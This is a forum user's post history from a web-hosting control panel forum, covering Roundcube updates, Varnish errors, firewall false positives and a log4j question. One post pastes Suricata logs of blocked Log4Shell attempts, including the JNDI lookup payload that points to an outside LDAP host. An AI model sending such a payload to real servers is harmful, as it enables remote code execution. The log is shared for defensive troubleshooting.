Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - tomkolp

Pages: [1]
1
E-Mail / Re: roundcube CVE-2023-5631
« on: November 05, 2023, 07:52:59 PM »
Roundcubemail has long been unsupported in cwp.  Now this is a security risk.  Each of my domains allows access to rouncubemail via the /webmail suffix. 

How will it turn off along with the whole roundube? 

Have you tried installing version 1.5.6?  I haven't tried it yet, but the 1.5.x series works for me, the php problem is from 1.6.x.

Edit:
I followed this guide, just change the version from 1.5.4 to 1.5.6 everywhere and it works:
https://www.alphagnu.com/topic/33-update-cwp-roundcube-mail-version-154-%E2%80%93-control-web-panel/

2
Information / Re: Roundcube version
« on: February 20, 2023, 09:40:10 AM »
What versions of roundcube are supported by cwp?  Index.php file says version 1.2.  Roundcube website lists 1.6 as the stable version.
Unfortunately version 1.5.3 is the last one working.
https://forum.centos-webpanel.com/index.php?topic=12064.msg43232#msg43232

3
Updates / Re: How can update PHP for cwpsrv
« on: February 07, 2023, 12:17:21 PM »
https://forum.centos-webpanel.com/index.php?topic=12064.msg43232#msg43232
I've been waiting for an update like this for months.
May there be an update sooner than the discovered CVEs in Roundcube.

Is it possible to completely remove Roundcube?

4
E-Mail / Re: Roundcube update not working due to php version of cwpsrv
« on: January 13, 2023, 12:10:54 PM »
Cwpsrv has it's own fpm.  the service is called cwpsrv-phpfpm and cwp-phpfpm  They use /usr/local/cwp/php71 (It's actually 7.2).  I'm working on an update for you, but work 60 hours a week, so not a lot of time
Do you know when the new version of Roundcube will be available? How to completely disable Roundcube in CWP when CVE vulnerabilities appear in outdated version 1.5.3

5
How to / Re: Cronjob for WPallimport
« on: August 09, 2022, 09:48:37 AM »
I use curl and it works. Connect via ssh and type in the console, or show the cron logs.

6
I wanted to update roundcube to 1.6 but roundcube requires a minimum php 7.3 version. Unfortunately version 1.5.3 is the last one working.

7
CSF Firewall / Re: lfd: (WPLOGIN) WP Login Attack (false positives)
« on: May 14, 2022, 12:18:55 PM »
I have the same problem.  My wordpress has an additional security of 2fa.  Therefore, each login generates two entries.  Just log in-> log out-> log in again to be blocked.  Preventing my country from being blocked is not a good solution.

8
Hi friends ...

We have had some problems with varnish ...
----------------------------------------------------
Error 503 Backend fetch failed

Backend fetch failed
Guru Meditation:

XID: 1279924
----------------------------------------------------

we use webserver configuration nginx-varnish-apache-php-fpm...
after some study/investigation of internet we found recomendations some changes in config files ...

we have added them to the files in: /etc/varnish/default.vcl
and we have added them have updated files in : /usr/local/cwpsrv/htdocs/resources/conf/web_servers/vhosts/varnish/default.tpl


then we have updated all domains in CWP > WebServers Domain Conf
And all changes  from default.vcl or default.tpl were updated in files in all fomain files: /etc/varnish/conf.d/vhosts

After this was everything OK and Error 503 Backend fetch failed .... they came only very rarely ....


But the biggest that after some time (may be after CWP update) the config files were rewrited to old ones ...
files in : /usr/local/cwpsrv/htdocs/resources/conf/web_servers/vhosts/varnish/default.tpl
and
all fomain files: /etc/varnish/conf.d/vhosts

all our changes were lost ...

Please why ???

we think that it is very BAD!!!

CAn you do something with this ???

Thank

Juraj
I have the same problem with varnish, can I ask for information what should be changed in these templates?

9
CentOS 7 Problems / Re: log4j security issue
« on: December 13, 2021, 11:40:31 AM »
External firewall

10
CentOS 7 Problems / Re: log4j security issue
« on: December 13, 2021, 11:15:44 AM »
I attach to the question. I also do not know if cwp is susceptible. Attempts to exploit this vulnerability are already appearing on the firewall.
Code: [Select]
2021-12-12T00:57:22 suricata[78162] [Drop] [1:10006897:2] ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034649:1] ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034647:1] ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":10006897,"rev":2,"signature":"ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"created_at":["2021_12_10"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034649,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034647,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}

11
CentOS-WebPanel GUI / Re: Security incidents will not load
« on: November 29, 2021, 07:13:29 AM »
Security incidents will not load in CWPpro version: 0.9.8.1102
Code: [Select]
Uncaught SyntaxError: Unexpected end of JSON input
    at JSON.parse (<anonymous>)
    at HTMLDocument.<anonymous> (index.php?module=security_center:2881)
    at n (js.php:2)
    at Object.fireWith (js.php:2)
    at Function.ready (js.php:2)
    at HTMLDocument.B (js.php:2)

12
CentOS-WebPanel GUI / Security incidents will not load
« on: November 23, 2021, 12:53:39 PM »
Security incidents will not load in CWPpro version: 0.9.8.1102

Pages: [1]